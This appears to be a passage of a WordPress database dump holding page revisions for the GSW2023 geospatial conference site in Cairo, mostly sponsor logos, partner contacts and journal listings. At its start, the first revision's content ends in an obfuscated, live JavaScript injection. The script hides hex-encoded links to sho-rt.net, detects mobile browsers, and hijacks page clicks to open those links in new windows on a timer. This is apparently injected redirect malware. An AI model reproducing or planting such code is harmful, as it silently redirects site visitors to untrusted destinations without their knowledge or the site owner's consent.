_0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-13 03:54:22','2023-08-13 03:54:22','',3066,'https://gsw2023.com/?p=5099',0,'revision','',0),
(5100,1,'2023-08-13 03:56:02','2023-08-13 03:56:02','[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 90px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 90px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\">Prime Sponsor</span></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 160px !important;}\"]\r\n\r\n<img class=\"alignnone wp-image-5093 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968955{margin-top: 95px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\r\n\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span>\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n\r\n<h3></h3>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" 